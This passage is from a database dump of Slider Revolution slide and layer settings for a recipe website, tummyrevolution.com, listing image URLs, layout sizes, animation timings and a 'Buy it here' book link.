15\",\"uid\":15,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/recept-11.png\",\"imageId\":4590},\"size\":{\"width\":{\"d\":{\"v\":\"541px\",\"e\":true},\"n\":{\"v\":\"428px\",\"e\":true},\"t\":{\"v\":\"344px\",\"e\":true},\"m\":{\"v\":\"333px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"645px\",\"e\":true},\"n\":{\"v\":\"510px\",\"e\":true},\"t\":{\"v\":\"410px\",\"e\":true},\"m\":{\"v\":\"396px\",\"e\":true}},\"originalWidth\":552,\"originalHeight\":657,\"aspectRatio\":{\"d\":{\"v\":0.840182648401826437378758782870136201381683349609375},\"n\":{\"v\":0.840182648401826437378758782870136201381683349609375},\"t\":{\"v\":0.840182648401826437378758782870136201381683349609375},\"m\":{\"v\":0.840182648401826437378758782870136201381683349609375}}},\"position\":{\"x\":{\"d\":{\"v\":\"83px\",\"e\":true},\"n\":{\"v\":\"213px\",\"e\":true},\"t\":{\"v\":\"-88px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"138px\",\"e\":true},\"n\":{\"v\":\"83px\",\"e\":true},\"t\":{\"v\":\"210px\",\"e\":true},\"m\":{\"v\":\"81px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":18,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":18,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1340,\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/summer-booze\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"Linear.easeNone\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(27,15,1,'[]','','{\"temp\":true}'),(28,15,2,'[]','','{\"temp\":true}'),(30,16,5,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/drink-gren-1943x1300-1.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":30}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(31,16,2,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/orange-tea-1943-x-1300.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":31}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(32,16,6,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/recipe-website.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":32}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(33,16,1,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/orange-banana-ready-1300-x-1945.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":33}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(34,16,3,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/fish-1300x1943-1.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":34}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(35,16,7,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/carrot-1943-x1300.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":35}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(37,16,4,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/Icecream-pineapplefw.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":37}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(38,17,1,'[]','','{\"temp\":true}'),(39,17,2,'[]','','{\"temp\":true}'),(40,18,1,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/slideshow_1_2048x2048.jpg\",\"imageId\":5245,\"imageLib\":\"medialibrary\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]}}','{\"3\":{\"text\":\"\",\"alias\":\"Image-3\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/long-advert-book-NW.jpg\",\"imageId\":5245,\"loaded\":true,\"imageLib\":\"medialibrary\"},\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"1359px\",\"e\":true},\"n\":{\"v\":\"1122px\"},\"t\":{\"v\":\"852px\"},\"m\":{\"v\":\"525px\"}},\"height\":{\"d\":{\"v\":\"453px\",\"e\":true},\"n\":{\"v\":\"374px\"},\"t\":{\"v\":\"284px\"},\"m\":{\"v\":\"175px\"}},\"originalWidth\":1200,\"originalHeight\":400,\"aspectRatio\":{\"d\":{\"v\":3},\"n\":{\"v\":3},\"t\":{\"v\":3},\"m\":{\"v\":3}},\"scaleProportional\":true,\"originalSize\":true},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-1px\",\"e\":true}},\"zIndex\":7},\"group\":{\"groupOrder\":7},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":9000,\"endWithSlide\":true,\"frameLength\":300}}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"16\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"20\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[]},\"type\":\"image\"},\"11\":{\"text\":\"Buy it here\",\"alias\":\"Button-11\",\"uid\":11,\"toggle\":{\"text\":\"\"},\"size\":{\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"967px\",\"e\":true},\"n\":{\"v\":\"798px\"},\"t\":{\"v\":\"606px\"},\"m\":{\"v\":\"373px\"}},\"y\":{\"d\":{\"v\":\"296px\",\"e\":true},\"n\":{\"v\":\"244px\"},\"t\":{\"v\":\"185px\"},\"m\":{\"v\":\"114px\"}},\"zIndex\":10},\"group\":{\"groupOrder\":10},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":9000,\"endWithSlide\":true,\"frameLength\":300}}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,20,0,20],\"e\":false},\"n\":{\"v\":[0,17,0,17],\"e\":false},\"t\":{\"v\":[0,13,0,13],\"e\":false},\"m\":{\"v\":[0,8,0,8],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"16\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"fontWeight\":{\"d\":{\"v\":\"500\"},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"lineHeight\":{\"d\":{\"v\":\"50\"},\"n\":{\"v\":\"41\"},\"t\":{\"v\":\"31\"},\"m\":{\"v\":\"19\"}},\"backgroundColor\":\"#494649\",\"borderRadius\":{\"v\":[\"25px\",\"25px\",\"25px\",\"25px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"usehover\":true,\"color\":\"rgba(0,0,0,1)\",\"backgroundColor\":\"#ffffff\",\"borderRadius\":{\"v\":[\"25px\",\"25px\",\"25px\",\"25px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"speed\":200,\"ease\":\"Power1.easeInOut\"},\"actions\":{\"action\":[{\"action\":\"link\",\"tooltip_event\":\"click\",\"link_help_in\":\"keep\",\"link_open_in\":\"_self\",\"link_follow\":\"nofollow\",\"link_type\":\"a\",\"image_link\":\"http:\\/\\/tummyrevolution.com\\/buy-book\\/\"}]},\"runtime\":{\"internalClass\":\"rev-btn\"},\"type\":\"button\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(41,18,2,'{\"runtime\":{\"collapsedGroups\":[]},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]}}','{\"4\":{\"text\":\"\",\"alias\":\"Image-4\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/long-advert-text-NW.jpg\",\"imageId\":5246,\"loaded\":true,\"imageLib\":\"medialibrary\"},\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"1380px\",\"e\":true},\"n\":{\"v\":\"1139px\"},\"t\":{\"v\":\"865px\"},\"m\":{\"v\":\"533px\"}},\"height\":{\"d\":{\"v\":\"460px\",\"e\":true},\"n\":{\"v\":\"379px\"},\"t\":{\"v\":\"287px\"},\"m\":{\"v\":\"177px\"}},\"originalWidth\":1200,\"originalHeight\":400,\"aspectRatio\":{\"d\":{\"v\":3},\"n\":{\"v\":3},\"t\":{\"v\":3},\"m\":{\"v\":3}},\"scaleProportional\":true,\"originalSize\":true},\"position\":{\"x\":{\"d\":{\"v\":\"-69px\",\"e\":true},\"n\":{\"v\":\"-56px\"},\"t\":{\"v\":\"-42px\"},\"m\":{\"v\":\"-25px\"}},\"y\":{\"d\":{\"v\":\"-9px\",\"e\":true},\"n\":{\"v\":\"-7px\"},\"t\":{\"v\":\"-5px\"},\"m\":{\"v\":\"-3px\"}},\"zIndex\":5},\"group\":{\"groupOrder\":5},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":9000,\"endWithSlide\":true,\"frameLength\":300}}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"16\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"20\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[]},\"type\":\"image\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(42,18,3,'{\"runtime\":{\"collapsedGroups\":[]},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]}}','{\"6\":{\"text\":\"\",\"alias\":\"Image-6\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/long-advert-NW-recipes.jpg\",\"imageId\":5247,\"loaded\":true,\"imageLib\":\"medialibrary\"},\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"1500px\",\"e\":true},\"n\":{\"v\":\"1238px\"},\"t\":{\"v\":\"940px\"},\"m\":{\"